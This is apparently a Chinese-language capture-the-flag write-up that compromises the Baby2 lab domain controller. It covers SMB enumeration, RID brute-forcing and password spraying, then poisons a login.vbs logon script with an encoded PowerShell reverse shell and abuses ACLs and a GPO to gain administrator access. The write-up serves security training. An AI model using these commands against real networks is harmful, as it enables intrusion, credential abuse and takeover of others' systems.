初始扫描
nmap扫描发现21个开放TCP端口,显示这是一个Windows域控制器:
1
2
3
4
5
6
|
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.194.134
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
445/tcp open microsoft-ds
# ...其他端口...
|
SMB枚举
使用netexec进行SMB共享枚举,发现多个可访问共享:
1
2
3
4
5
6
7
8
9
10
|
oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --shares
Share Permissions
ADMIN$
apps READ
C$
docs
homes READ,WRITE
IPC$ READ
NETLOGON READ
SYSVOL
|
用户发现
通过RID暴力枚举发现域用户:
1
2
3
4
5
|
oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --rid-brute
500: BABY2\Administrator
1108: BABY2\Carl.Moore
1114: BABY2\Amelia.Griffiths
1602: BABY2\library
|
密码喷洒攻击
发现两个用户使用用户名作为密码:
1
2
3
|
oxdf@hacky$ netexec smb dc.baby2.vl -u users -p users --no-bruteforce
[+] baby2.vl\Carl.Moore:Carl.Moore
[+] baby2.vl\library:library
|
SYSVOL共享利用
分析发现login.vbs登录脚本可写入,用于驱动映射:
1
2
3
4
5
|
Sub MapNetworkShare(sharePath, driveLetter)
' 网络驱动映射代码
End Sub
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
|
登录脚本投毒
在login.vbs中添加PowerShell反向shell代码:
1
2
|
Set cmdshell = CreateObject("Wscript.Shell")
cmdshell.run "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdw..."
|
权限提升
使用BloodHound分析发现legacy组对GPOADM有WriteOwner权限:
1
2
|
Add-DomainObjectAcl -Rights all -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths
Set-DomainUserPassword GPOADM -AccountPassword $cred
|
GPO滥用提权
使用pyGPOAbuse工具通过组策略添加管理员权限:
1
2
3
|
uv run --script pygpoabuse.py baby2.vl/GPOADM:0xdf0xdf. \
-gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 \
-command 'net localgroup administrators GPOADM /add'
|
最终权限
成功获得管理员权限并获取flag:
1
2
|
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
29350096************************
|